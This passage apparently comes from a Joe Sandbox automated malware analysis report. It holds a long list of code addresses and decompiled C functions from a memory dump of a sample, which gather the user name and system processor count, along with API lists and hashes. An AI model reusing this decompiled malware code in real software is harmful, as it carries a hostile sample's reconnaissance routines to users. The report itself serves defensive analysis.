                                                                                                                                                            0x009cc2d9
                                                                                                                                                            0x009cc2dc
                                                                                                                                                            0x009cc2e2
                                                                                                                                                            0x009cc2ea
                                                                                                                                                            0x009cc304
                                                                                                                                                            0x009cc2ec
                                                                                                                                                            0x009cc2f4
                                                                                                                                                            0x009cc2f7
                                                                                                                                                            0x009cc2fc
                                                                                                                                                            0x009cc2fc
                                                                                                                                                            0x009cc2ea
                                                                                                                                                            0x009cc309
                                                                                                                                                            0x009cc30c
                                                                                                                                                            0x009cc30c
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cc30c
                                                                                                                                                            0x009cc22c
                                                                                                                                                            0x009cc270
                                                                                                                                                            0x009cc273
                                                                                                                                                            0x009cc275
                                                                                                                                                            0x009cc278
                                                                                                                                                            0x009cc27f
                                                                                                                                                            0x009cc282
                                                                                                                                                            0x009cc28b
                                                                                                                                                            0x009cc28d
                                                                                                                                                            0x009cc293
                                                                                                                                                            0x009cc296
                                                                                                                                                            0x009cc296
                                                                                                                                                            0x009cc299
                                                                                                                                                            0x009cc29d
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cc278
                                                                                                                                                            0x009cc22e
                                                                                                                                                            0x009cc233
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cc239
                                                                                                                                                            0x009cc23f
                                                                                                                                                            0x009cc242
                                                                                                                                                            0x009cc245
                                                                                                                                                            0x009cc248
                                                                                                                                                            0x009cc24b
                                                                                                                                                            0x009cc250
                                                                                                                                                            0x009cc253
                                                                                                                                                            0x009cc256
                                                                                                                                                            0x009cc259
                                                                                                                                                            0x009cc25c
                                                                                                                                                            0x009cc25f
                                                                                                                                                            0x009cc262
                                                                                                                                                            0x009cc265
                                                                                                                                                            0x009cc268
                                                                                                                                                            0x009cc26b
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cc1cd
                                                                                                                                                            0x009cc1d1
                                                                                                                                                            0x009cc1d3
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cc1dc
                                                                                                                                                            0x009cc1df
                                                                                                                                                            0x009cc1e3
                                                                                                                                                            0x009cc1e9
                                                                                                                                                            0x009cc1ec
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cc1ec
                                                                                                                                                            0x009cc1c6
                                                                                                                                                            0x009cc1bc
                                                                                                                                                            0x009cc0fa
                                                                                                                                                            0x009cc0fc
                                                                                                                                                            0x009cc0fd
                                                                                                                                                            0x009cc103
                                                                                                                                                            0x009cc146
                                                                                                                                                            0x009cc19b
                                                                                                                                                            0x009cc19f
                                                                                                                                                            0x009cc1ac
                                                                                                                                                            0x009cc1b1
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cc1b1
                                                                                                                                                            0x009cc14f
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cc158
                                                                                                                                                            0x009cc15f
                                                                                                                                                            0x009cc161
                                                                                                                                                            0x009cc161
                                                                                                                                                            0x009cc16a
                                                                                                                                                            0x009cc16d
                                                                                                                                                            0x009cc17c
                                                                                                                                                            0x009cc183
                                                                                                                                                            0x009cc186
                                                                                                                                                            0x009cc188
                                                                                                                                                            0x009cc18b
                                                                                                                                                            0x009cc18e
                                                                                                                                                            0x009cc190
                                                                                                                                                            0x009cc193
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cc193
                                                                                                                                                            0x009cc10b
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cc121
                                                                                                                                                            0x009cc124
                                                                                                                                                            0x009cc12d
                                                                                                                                                            0x009cc130
                                                                                                                                                            0x009cc132
                                                                                                                                                            0x009cc135
                                                                                                                                                            0x009cc138
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cc138
                                                                                                                                                            0x009cbd8c
                                                                                                                                                            0x009cbd8e
                                                                                                                                                            0x009cbd91
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbd97
                                                                                                                                                            0x009cbd9a
                                                                                                                                                            0x009cbd74
                                                                                                                                                            0x009cbd74
                                                                                                                                                            0x009cbd77
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbd77
                                                                                                                                                            0x009cbd9c
                                                                                                                                                            0x009cbd9f
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbda5
                                                                                                                                                            0x009cbda8
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbdb1
                                                                                                                                                            0x009cc0b3
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cc0c3
                                                                                                                                                            0x009cc0c6
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cc0c6
                                                                                                                                                            0x009cc0b3
                                                                                                                                                            0x009cbdba
                                                                                                                                                            0x009cbdd0
                                                                                                                                                            0x009cbde6
                                                                                                                                                            0x009cbdec
                                                                                                                                                            0x009cc07f
                                                                                                                                                            0x009cc084
                                                                                                                                                            0x009cc089
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cc08f
                                                                                                                                                            0x009cc095
                                                                                                                                                            0x009cc098
                                                                                                                                                            0x009cc09b
                                                                                                                                                            0x009cc09d
                                                                                                                                                            0x009cc0a3
                                                                                                                                                            0x009cc0a6
                                                                                                                                                            0x009cc0a9
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cc0a9
                                                                                                                                                            0x009cbdf5
                                                                                                                                                            0x009cc046
                                                                                                                                                            0x009cc04b
                                                                                                                                                            0x009cc050
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cc059
                                                                                                                                                            0x009cc05c
                                                                                                                                                            0x009cc05f
                                                                                                                                                            0x009cc062
                                                                                                                                                            0x009cc065
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cc065
                                                                                                                                                            0x009cbdfe
                                                                                                                                                            0x009cbfc1
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbfc7
                                                                                                                                                            0x009cbfc8
                                                                                                                                                            0x009cbfce
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbfd4
                                                                                                                                                            0x009cbfd5
                                                                                                                                                            0x009cbfdb
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbfe1
                                                                                                                                                            0x009cbfe2
                                                                                                                                                            0x009cbfe8
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbfee
                                                                                                                                                            0x009cbfef
                                                                                                                                                            0x009cbff5
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbffb
                                                                                                                                                            0x009cbffd
                                                                                                                                                            0x009cc000
                                                                                                                                                            0x009cc004
                                                                                                                                                            0x009cc008
                                                                                                                                                            0x009cc00c
                                                                                                                                                            0x009cc00d
                                                                                                                                                            0x009cc012
                                                                                                                                                            0x009cc017
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cc020
                                                                                                                                                            0x009cc023
                                                                                                                                                            0x009cc026
                                                                                                                                                            0x009cc029
                                                                                                                                                            0x009cc02c
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cc02c
                                                                                                                                                            0x009cbe07
                                                                                                                                                            0x009cbf88
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbf8e
                                                                                                                                                            0x009cbf8f
                                                                                                                                                            0x009cbf95
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbf9b
                                                                                                                                                            0x009cbf9c
                                                                                                                                                            0x009cbfa2
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbfa8
                                                                                                                                                            0x009cbfa9
                                                                                                                                                            0x009cbfaf
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbfb5
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbfb5
                                                                                                                                                            0x009cbe10
                                                                                                                                                            0x009cbf15
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbf1b
                                                                                                                                                            0x009cbf1c
                                                                                                                                                            0x009cbf22
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbf28
                                                                                                                                                            0x009cbf29
                                                                                                                                                            0x009cbf2f
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbf35
                                                                                                                                                            0x009cbf36
                                                                                                                                                            0x009cbf3c
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbf54
                                                                                                                                                            0x009cbf59
                                                                                                                                                            0x009cbf5e
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbf64
                                                                                                                                                            0x009cbf6d
                                                                                                                                                            0x009cbf70
                                                                                                                                                            0x009cbf72
                                                                                                                                                            0x009cbf75
                                                                                                                                                            0x009cbf78
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbf78
                                                                                                                                                            0x009cbe19
                                                                                                                                                            0x009cbeec
                                                                                                                                                            0x009cbef1
                                                                                                                                                            0x009cbef6
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbefc
                                                                                                                                                            0x009cbeff
                                                                                                                                                            0x009cbf02
                                                                                                                                                            0x009cbf05
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbf05
                                                                                                                                                            0x009cbe22
                                                                                                                                                            0x009cbe2c
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbe32
                                                                                                                                                            0x009cbe32
                                                                                                                                                            0x009cbe44
                                                                                                                                                            0x009cbe49
                                                                                                                                                            0x009cbe4e
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbe58
                                                                                                                                                            0x009cbe5b
                                                                                                                                                            0x009cbea5
                                                                                                                                                            0x009cbea9
                                                                                                                                                            0x009cbeaf
                                                                                                                                                            0x009cbeb3
                                                                                                                                                            0x009cbeb7
                                                                                                                                                            0x009cbebf
                                                                                                                                                            0x009cbec2
                                                                                                                                                            0x009cbec5
                                                                                                                                                            0x009cbecf
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbecf
                                                                                                                                                            0x009cbec7
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbec7
                                                                                                                                                            0x009cbe5d
                                                                                                                                                            0x009cbe60
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbe63
                                                                                                                                                            0x009cbe65
                                                                                                                                                            0x009cbe6d
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbe7f
                                                                                                                                                            0x009cbe7f
                                                                                                                                                            0x009cbe7f
                                                                                                                                                            0x009cbe80
                                                                                                                                                            0x009cbe85
                                                                                                                                                            0x009cbe8b
                                                                                                                                                            0x009cbe8e
                                                                                                                                                            0x009cbe91
                                                                                                                                                            0x009cbe94
                                                                                                                                                            0x009cbe97
                                                                                                                                                            0x009cbe9a
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbe9a
                                                                                                                                                            0x009cbe87
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbe87
                                                                                                                                                            0x009cbe65
                                                                                                                                                            0x009cbe63
                                                                                                                                                            0x009cbe22
                                                                                                                                                            0x009cbdd5
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbddb
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbddb
                                                                                                                                                            0x009cbdbf
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbdc5
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbdc5
                                                                                                                                                            0x009cbd44
                                                                                                                                                            0x009cc41e
                                                                                                                                                            0x009cc41e
                                                                                                                                                            0x009cc422
                                                                                                                                                            0x009cc425
                                                                                                                                                            0x009cc428
                                                                                                                                                            0x009cc435
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cc435
                                                                                                                                                            0x009cc42a
                                                                                                                                                            0x009cc42d
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cc42d
                                                                                                                                                            0x009cbd4d
                                                                                                                                                            0x009cbd4f
                                                                                                                                                            0x009cbd52
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbd58
                                                                                                                                                            0x009cbd5b
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbd5d
                                                                                                                                                            0x009cbd60
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbd69
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbd6f
                                                                                                                                                            0x009cbc2b
                                                                                                                                                            0x009cbcfa
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbcfc
                                                                                                                                                            0x009cbd01
                                                                                                                                                            0x009cbd0d
                                                                                                                                                            0x009cbd0e
                                                                                                                                                            0x009cbd14
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbd1a
                                                                                                                                                            0x009cbd1e
                                                                                                                                                            0x009cbd33
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbd33
                                                                                                                                                            0x009cbd22
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbd28
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbd01
                                                                                                                                                            0x009cbc37
                                                                                                                                                            0x009cbcb6
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbcbc
                                                                                                                                                            0x009cbcc0
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbcc9
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbcd5
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbcdf
                                                                                                                                                            0x009cbce2
                                                                                                                                                            0x009cbce8
                                                                                                                                                            0x009cbcee
                                                                                                                                                            0x009cbcef
                                                                                                                                                            0x009cbcef
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbce2
                                                                                                                                                            0x009cbc39
                                                                                                                                                            0x009cbc3e
                                                                                                                                                            0x009cbc4d
                                                                                                                                                            0x009cbc53
                                                                                                                                                            0x009cbc54
                                                                                                                                                            0x009cbc54
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbc3e
                                                                                                                                                            0x009cb8e4
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cb8f3
                                                                                                                                                            0x009cb8f6
                                                                                                                                                            0x009cbbd5
                                                                                                                                                            0x009cbbe7
                                                                                                                                                            0x009cbc98
                                                                                                                                                            0x009cbc9a
                                                                                                                                                            0x009cbc9c
                                                                                                                                                            0x009cbca5
                                                                                                                                                            0x009cbca8
                                                                                                                                                            0x009cbca8
                                                                                                                                                            0x009cbbc9
                                                                                                                                                            0x009cbbc9
                                                                                                                                                            0x009cbbca
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbbca
                                                                                                                                                            0x009cbbef
                                                                                                                                                            0x009cbbf4
                                                                                                                                                            0x009cbbf4
                                                                                                                                                            0x009cbbfb
                                                                                                                                                            0x009cbbfe
                                                                                                                                                            0x009cbc02
                                                                                                                                                            0x009cbc05
                                                                                                                                                            0x009cbc08
                                                                                                                                                            0x009cbc60
                                                                                                                                                            0x009cbc62
                                                                                                                                                            0x009cbc76
                                                                                                                                                            0x009cbc80
                                                                                                                                                            0x009cbc83
                                                                                                                                                            0x009cbc87
                                                                                                                                                            0x009cbc8a
                                                                                                                                                            0x009cbc64
                                                                                                                                                            0x009cbc64
                                                                                                                                                            0x009cbc67
                                                                                                                                                            0x009cbc67
                                                                                                                                                            0x009cbc8d
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbc0a
                                                                                                                                                            0x009cbc0d
                                                                                                                                                            0x009cbc10
                                                                                                                                                            0x009cbc12
                                                                                                                                                            0x009cbc15
                                                                                                                                                            0x009cbc18
                                                                                                                                                            0x009cbc18
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbc10
                                                                                                                                                            0x009cbc08
                                                                                                                                                            0x009cbbd7
                                                                                                                                                            0x009cbbda
                                                                                                                                                            0x009cbbdc
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbbdc
                                                                                                                                                            0x009cb8fc
                                                                                                                                                            0x009cb902
                                                                                                                                                            0x009cb905
                                                                                                                                                            0x009cb907
                                                                                                                                                            0x009cb90a
                                                                                                                                                            0x009cbbbb
                                                                                                                                                            0x009cbbc0
                                                                                                                                                            0x009cbbc5
                                                                                                                                                            0x009cbbc5
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbbc0
                                                                                                                                                            0x009cb910
                                                                                                                                                            0x009cb913
                                                                                                                                                            0x009cbbab
                                                                                                                                                            0x009cbbb0
                                                                                                                                                            0x009cbbb5
                                                                                                                                                            0x009cbbb5
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbbb0
                                                                                                                                                            0x009cb919
                                                                                                                                                            0x009cb91c
                                                                                                                                                            0x009cbb9b
                                                                                                                                                            0x009cbba0
                                                                                                                                                            0x009cbba5
                                                                                                                                                            0x009cbba5
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbba0
                                                                                                                                                            0x009cb922
                                                                                                                                                            0x009cb925
                                                                                                                                                            0x009cbb8b
                                                                                                                                                            0x009cbb90
                                                                                                                                                            0x009cbb95
                                                                                                                                                            0x009cbb95
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbb90
                                                                                                                                                            0x009cb92c
                                                                                                                                                            0x009cb92f
                                                                                                                                                            0x009cbb7b
                                                                                                                                                            0x009cbb80
                                                                                                                                                            0x009cbb85
                                                                                                                                                            0x009cbb85
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbb80
                                                                                                                                                            0x009cb938
                                                                                                                                                            0x009cb94a
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cb950
                                                                                                                                                            0x009cb951
                                                                                                                                                            0x009cb958
                                                                                                                                                            0x009cb95d
                                                                                                                                                            0x009cb963
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cb969
                                                                                                                                                            0x009cb96a
                                                                                                                                                            0x009cb971
                                                                                                                                                            0x009cb976
                                                                                                                                                            0x009cb97c
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cb982
                                                                                                                                                            0x009cb983
                                                                                                                                                            0x009cb98a
                                                                                                                                                            0x009cb98f
                                                                                                                                                            0x009cb995
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cb99b
                                                                                                                                                            0x009cb99c
                                                                                                                                                            0x009cb9a3
                                                                                                                                                            0x009cb9a8
                                                                                                                                                            0x009cb9ae
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cb9c4
                                                                                                                                                            0x009cb9d3
                                                                                                                                                            0x009cb9da
                                                                                                                                                            0x009cb9de
                                                                                                                                                            0x009cb9eb
                                                                                                                                                            0x009cbaab
                                                                                                                                                            0x009cbaab
                                                                                                                                                            0x009cbab1
                                                                                                                                                            0x009cbacf
                                                                                                                                                            0x009cbb02
                                                                                                                                                            0x009cbb38
                                                                                                                                                            0x009cbb42
                                                                                                                                                            0x009cbb4c
                                                                                                                                                            0x009cbb58
                                                                                                                                                            0x009cbb6b
                                                                                                                                                            0x009cbb6f
                                                                                                                                                            0x009cbb73
                                                                                                                                                            0x009cbaf4
                                                                                                                                                            0x009cbaf4
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbaf4
                                                                                                                                                            0x009cbb3a
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbb3a
                                                                                                                                                            0x009cbb06
                                                                                                                                                            0x009cbb0d
                                                                                                                                                            0x009cbb17
                                                                                                                                                            0x009cbb29
                                                                                                                                                            0x009cbb2d
                                                                                                                                                            0x009cbb31
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbb08
                                                                                                                                                            0x009cbb08
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbb08
                                                                                                                                                            0x009cbb06
                                                                                                                                                            0x009cbad3
                                                                                                                                                            0x009cbada
                                                                                                                                                            0x009cbaea
                                                                                                                                                            0x009cbaed
                                                                                                                                                            0x009cbaf1
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbad5
                                                                                                                                                            0x009cbad5
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbad5
                                                                                                                                                            0x009cbab3
                                                                                                                                                            0x009cbab5
                                                                                                                                                            0x009cbaba
                                                                                                                                                            0x009cbaba
                                                                                                                                                            0x009cbabd
                                                                                                                                                            0x009cbabe
                                                                                                                                                            0x009cbabe
                                                                                                                                                            0x009cbac1
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbac1
                                                                                                                                                            0x009cbab1
                                                                                                                                                            0x009cb9f9
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cb9ff
                                                                                                                                                            0x009cba00
                                                                                                                                                            0x009cba06
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cba0c
                                                                                                                                                            0x009cba0d
                                                                                                                                                            0x009cba13
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cba19
                                                                                                                                                            0x009cba1a
                                                                                                                                                            0x009cba29
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cba2f
                                                                                                                                                            0x009cba30
                                                                                                                                                            0x009cba37
                                                                                                                                                            0x009cba3c
                                                                                                                                                            0x009cba42
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cba48
                                                                                                                                                            0x009cba49
                                                                                                                                                            0x009cba50
                                                                                                                                                            0x009cba55
                                                                                                                                                            0x009cba5b
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cba61
                                                                                                                                                            0x009cba62
                                                                                                                                                            0x009cba69
                                                                                                                                                            0x009cba6e
                                                                                                                                                            0x009cba74
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cba7a
                                                                                                                                                            0x009cba93
                                                                                                                                                            0x009cbaa2
                                                                                                                                                            0x009cbaa9
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbaa9
                                                                                                                                                            0x009cb93a
                                                                                                                                                            0x009cb93a
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cb93a
                                                                                                                                                            0x009cb938
                                                                                                                                                            0x009cb8e4
                                                                                                                                                            0x009cb8c8

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: -
                                                                                                                                                            • API String ID: 0-2547889144
                                                                                                                                                            • Opcode ID: bec80a3cdb5ca75ec6d60ce1cddd93174733d632bcac847c0448635cbdb77f5d
                                                                                                                                                            • Instruction ID: ab712f22e8e665be4c3d6bfc2cae624c3b325bda1ff083700813c0dd617e329b
                                                                                                                                                            • Opcode Fuzzy Hash: bec80a3cdb5ca75ec6d60ce1cddd93174733d632bcac847c0448635cbdb77f5d
                                                                                                                                                            • Instruction Fuzzy Hash: 5B82F2B1D006098FDF24CFA9C891BBEBFB8BF49310F68855ED459A7295C3349942CB52
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C505F, Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C505F() {
				long _v8;
				WCHAR* _t3;
				int _t5;
				WCHAR* _t11;

				_t3 = E009C47AB(0x202);
				_t11 = _t3;
				if(_t11 != 0) {
					_v8 = 0x101;
					_t5 = GetUserNameW(_t11,  &_v8); // executed
					if(_t5 == 0) {
						E009C47F8(_t11);
						_t11 = 0;
					}
					_t3 = _t11;
				}
				return _t3;
			}







                                                                                                                                                            0x009c5069
                                                                                                                                                            0x009c506e
                                                                                                                                                            0x009c5073
                                                                                                                                                            0x009c5078
                                                                                                                                                            0x009c5081
                                                                                                                                                            0x009c5089
                                                                                                                                                            0x009c508c
                                                                                                                                                            0x009c5092
                                                                                                                                                            0x009c5092
                                                                                                                                                            0x009c5094
                                                                                                                                                            0x009c5094
                                                                                                                                                            0x009c509a

                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 009C47AB: HeapCreate.KERNEL32(00000000,00400000,00000000,?,009C1C60,?,?,009C150C), ref: 009C47C0
                                                                                                                                                              • Part of subcall function 009C47AB: GetProcessHeap.KERNEL32(?,009C1C60,?,?,009C150C), ref: 009C47CF
                                                                                                                                                            • GetUserNameW.ADVAPI32(00000000,009C1981), ref: 009C5081
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Heap$CreateNameProcessUser
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 499767188-0
                                                                                                                                                            • Opcode ID: 73a1ce7e54d360cd4211c1217a8747cc6003b550d1309185a3d03cf60bad8030
                                                                                                                                                            • Instruction ID: 0d0ac4e35d1d7c507ce97cf0a278b841b98d3ba5257c4ff661e04a5057baed11
                                                                                                                                                            • Opcode Fuzzy Hash: 73a1ce7e54d360cd4211c1217a8747cc6003b550d1309185a3d03cf60bad8030
                                                                                                                                                            • Instruction Fuzzy Hash: ABE02632E12A39679220D7A89C09F9BB79CCB02760B02014EFC04D2204EB905E0001D2
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C5370, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C5370() {
				struct _SYSTEM_INFO _v40;

				GetSystemInfo( &_v40); // executed
				return _v40.dwNumberOfProcessors;
			}




                                                                                                                                                            0x009c537a
                                                                                                                                                            0x009c5386

                                                                                                                                                            APIs
                                                                                                                                                            • GetSystemInfo.KERNEL32(?,?,009C33C5,?,00000000,00000000,009C3571,00000000,00000000), ref: 009C537A
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InfoSystem
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 31276548-0
